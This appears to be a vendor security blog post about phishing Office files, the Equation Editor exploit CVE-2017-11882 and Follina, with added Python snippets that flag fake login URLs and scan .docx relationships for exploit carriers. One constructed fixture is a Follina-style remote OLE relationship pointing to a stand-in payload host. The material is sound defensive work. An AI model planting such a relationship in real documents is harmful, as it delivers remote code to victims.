
Hackers have long used Word and Excel documents as malware delivery vehicles, and in 2025 these tricks are far from outdated. From phishing schemes to zero-click exploits, malicious Office files remain one of the easiest ways into victims' systems.
Here are the top three Microsoft Office-based exploits of the year, what they still do, and what you need to know to avoid them.
1. MS Office Phishing: Still a Hacker Favorite
Phishing attacks using Microsoft Office files have been around for years and are still going strong. Why? Because teams work in business environments where documents are exchanged constantly, so an incoming Office file is the most ordinary thing in the world.
Attackers know that people are used to opening Office files, especially when they appear to come from coworkers, clients, or partners. A fake invoice, a shared report, or a recruitment document: it doesn't take much to convince someone to click. And once the file is open, the attacker has their chance.
Office file phishing is most often aimed at stealing login credentials. These documents typically contain:
- Fake Microsoft 365 login page links
- Phishing portals that mimic company tools and services
In this ANY.RUN malware analysis session, the Excel file contains malicious phishing links.
View the analysis session with the Excel file
Excel file containing malicious links detected in the ANY.RUN sandbox
When the victim clicks the link, it leads to a web page that shows a Cloudflare "Check you are human" challenge.
Cloudflare verification passed with automated interactivity in ANY.RUN
After that, there is another redirect. This time it lands on a fake Microsoft login page.
Malicious link to a fake Microsoft login page, filled with random characters
At first glance, the page may look real. Inside the ANY.RUN sandbox, however, the red flag is easy to spot: the login URL is not an official Microsoft one. It is filled with random characters and clearly does not belong to a Microsoft domain.
Any credentials typed into this fake login page are forwarded directly to the attacker without the victim noticing.
Attackers are also getting more creative. Recently, some phishing documents have embedded QR codes. Scanned on a smartphone, these send victims to phishing websites or trigger malware downloads. They can still be detected and analyzed with tools like the ANY.RUN sandbox.
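The red flag the analyst spotted above (a "Microsoft" login URL whose host is not a Microsoft domain and is stuffed with random characters) can be turned into a simple triage check. The following is an added example, not code from ANY.RUN or the original article; the allowlist of Microsoft sign-in domains, the entropy thresholds and the sample URLs are my own assumptions and constructed test data, and the `.invalid` host is a reserved name used so the sample can never resolve.

```python
import math
from urllib.parse import urlparse

# Assumed allowlist of registrable domains on which Microsoft sign-in pages
# legitimately live. An organisation would maintain its own list.
MICROSOFT_LOGIN_DOMAINS = {"microsoftonline.com", "microsoft.com", "live.com", "office.com"}
BRAND_KEYWORDS = ("microsoft", "office", "login", "365")


def registrable_domain(host: str) -> str:
    """Last two labels of the host; adequate for the .com-style domains used here."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking labels score high, dictionary words low."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def login_url_red_flags(url: str) -> list:
    """Return the reasons a supposed Microsoft login URL looks like a phishing page.

    An empty list means no flag was raised, not that the URL is safe.
    """
    flags = []
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if parsed.scheme != "https":
        flags.append("not https")
    if not host:
        flags.append("no host in URL")
        return flags

    # 1. The domain is the decisive check: a Microsoft login page is served from
    #    a Microsoft domain, whatever the path says.
    if registrable_domain(host) not in MICROSOFT_LOGIN_DOMAINS:
        flags.append("host %r is outside the Microsoft login domains" % host)
        # A brand keyword inside a foreign host is a classic lookalike trick.
        if any(kw in host for kw in BRAND_KEYWORDS):
            flags.append("brand keyword in a non-Microsoft host (lookalike)")

    # 2. Random-character hostnames: long, high-entropy labels (threshold assumed).
    for label in host.split("."):
        if label.startswith("xn--"):
            flags.append("punycode label %r (possible homograph)" % label)
        elif len(label) >= 16 and shannon_entropy(label) > 3.5:
            flags.append("random-looking host label %r" % label)
    return flags


# Constructed samples for demonstration only.
LEGIT_URL = "https://login.microsoftonline.com/"
PHISH_URL = "http://secure-login-microsoft.x7qz3m9vk2hp4tbn8wrs-cdn.invalid/auth/a9f3k2l8q1z7x5c4v6b2n8m1"

if __name__ == "__main__":
    for u in (LEGIT_URL, PHISH_URL):
        print(u, "->", login_url_red_flags(u) or "no flags")
```

The domain check is the one that matters; the entropy and keyword heuristics only add explanation for the analyst and will produce false positives on CDN hostnames, so treat them as supporting evidence rather than a verdict.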
2. CVE-2017-11882: The Equation Editor Exploit That Won't Die
First discovered in 2017, CVE-2017-11882 is still used today against environments running outdated versions of Microsoft Office.
The vulnerability targets Microsoft Equation Editor, a rarely used component bundled with older Office builds. Its abuse is dangerous because simply opening a malicious Word file can trigger the exploit: no macros and no additional clicks are required.
In this case, the attacker uses the flaw to download and run a malware payload in the background over a connection to a remote server.
In our analysis session, the delivered payload was Agent Tesla, a well-known information stealer used to capture keystrokes, credentials, and clipboard data.
View the analysis session with the malicious payload
Phishing email containing a malicious Excel attachment
In the MITRE ATT&CK section of this analysis, you can see how the ANY.RUN sandbox detected the specific technique used in the attack.
Equation Editor exploitation detected by ANY.RUN
Microsoft patched the vulnerability years ago, but it still serves attackers who target unpatched systems. And because macros are disabled by default in newer Office versions, CVE-2017-11882 has become a fallback for cybercriminals who want to guarantee execution.
3. CVE-2022-30190: Follina Is Still in the Game
The Follina exploit (CVE-2022-30190) remains a favorite among attackers for one simple reason: it works without macros and requires no user interaction beyond opening the Word file.
Follina abuses a special URL scheme of the Microsoft Support Diagnostic Tool (MSDT) from within Office documents to run remote code. This means that merely viewing the file can launch a malicious PowerShell-based script and contact a command-and-control server.
View the analysis session with Follina
Follina technique detected in the ANY.RUN sandbox
In this malware analysis sample, the attack goes a step further. I observed the "Stegocampaign" tag, which indicates the use of steganography, a technique in which malware is hidden inside image files.
Use of steganography in the attack
The images are downloaded and processed with PowerShell to extract the actual payload without raising an immediate alarm.
Images carrying malicious payloads analyzed inside ANY.RUN
Worse, Follina is often used in multi-stage attack chains, combined with other vulnerabilities and payloads to increase the impact.
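Both document-borne exploits above reach the victim through the document's relationship metadata rather than through macros: Follina documents reference a remote object that leads to an ms-msdt: URL, and Equation Editor exploits arrive as an embedded OLE object. The scanner below is an added example of how a defender can triage a .docx for those carriers before anyone opens it; it is not ANY.RUN's code or the article's own. It parses only the OOXML relationship files, which is well documented, and the relationship type URIs are the standard ones. The sample documents are constructed in memory for the demonstration, and the flagged remote host uses a reserved `.invalid` name.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
# External targets an ordinary document has a reason to carry.
EXPECTED_SCHEMES = {"http", "https", "mailto"}


def scan_docx_relationships(docx_bytes: bytes) -> list:
    """Return findings for every relationship that matches a known exploit carrier."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(RELS_NS + "Relationship"):
                rtype = rel.get("Type", "")
                target = rel.get("Target", "")
                external = rel.get("TargetMode", "Internal").lower() == "external"
                scheme = urlparse(target).scheme.lower()

                if "ms-msdt:" in target.lower():
                    # Direct MSDT invocation (Follina, CVE-2022-30190).
                    findings.append("%s: ms-msdt: target %r" % (name, target))
                elif rtype == OLE_TYPE and external:
                    # An OLE object fetched from a remote URL: the Follina delivery
                    # pattern, where the fetched HTML carries the ms-msdt: URL.
                    findings.append("%s: remote OLE object %r" % (name, target))
                elif external and scheme and scheme not in EXPECTED_SCHEMES:
                    findings.append("%s: unexpected URL scheme %r" % (name, scheme))
                elif rtype == OLE_TYPE:
                    # Embedded object: the carrier Equation Editor exploits
                    # (CVE-2017-11882) use, so it deserves a closer look.
                    findings.append("%s: embedded OLE object %r" % (name, target))
    return findings


def build_sample_docx(rels_xml: str) -> bytes:
    """Build a minimal, constructed .docx in memory with the given document.xml.rels."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


RELS_HEAD = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
             '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">')
STYLES_REL = ('<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/'
              '2006/relationships/styles" Target="styles.xml"/>')

# Constructed samples: a clean document, a Follina-style one, and one with an embedded object.
CLEAN_DOCX = build_sample_docx(RELS_HEAD + STYLES_REL + "</Relationships>")
FOLLINA_DOCX = build_sample_docx(
    RELS_HEAD + STYLES_REL
    + '<Relationship Id="rId5" Type="%s" Target="http://remote-template.invalid/payload.html!" '
      'TargetMode="External"/>' % OLE_TYPE
    + "</Relationships>")
EMBEDDED_OLE_DOCX = build_sample_docx(
    RELS_HEAD + STYLES_REL
    + '<Relationship Id="rId7" Type="%s" Target="embeddings/oleObject1.bin"/>' % OLE_TYPE
    + "</Relationships>")

if __name__ == "__main__":
    for label, doc in (("clean", CLEAN_DOCX), ("follina", FOLLINA_DOCX), ("embedded", EMBEDDED_OLE_DOCX)):
        print(label, "->", scan_docx_relationships(doc) or "no findings")
```

A hit from this scanner is a reason to send the file to a sandbox, not a verdict: legitimate documents do embed OLE objects, whereas an external oleObject relationship or any ms-msdt: target has no business use and should be treated as malicious.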
What does this mean for teams using MS Office?
If your team relies heavily on Microsoft Office for its day-to-day operations, the attacks above should be a wake-up call.
Cybercriminals know that Office files are trusted and widely used in business, so they keep exploiting them. Whether it is a simple Excel sheet hiding phishing links or a Word document silently running malicious code, these files can pose a serious risk to your organization's security.
Here is what your team can do:
- Review how Office documents are handled internally, and limit whether files from external sources can be opened or downloaded.
- Use tools like the ANY.RUN sandbox to inspect suspicious files in a safe, isolated environment before anyone on your team opens them.
- Update all Office software regularly, and disable legacy features such as macros and Equation Editor where possible.
- Stay informed about new exploit techniques tied to Office files so that your security team can respond quickly.
Analyze mobile malware with ANY.RUN's new Android OS support
The threat doesn't stop at Office files. Mobile devices are now important targets too, with attackers spreading malware through fake apps, phishing links and malicious APKs.
This means a larger attack surface for businesses and a need for wider visibility.
With ANY.RUN's new Android OS support, your security team can do this right away:
- Analyze Android malware in a real mobile environment
- Investigate suspicious APK behavior before it reaches production devices
- Gain clearer visibility into mobile threats across both desktop and mobile ecosystems
- Support incident response
This is a big step toward full coverage, and it is available on all plans, including the free one.
Start your first Android threat analysis and give your security analysts the visibility they need to protect the mobile attack surface.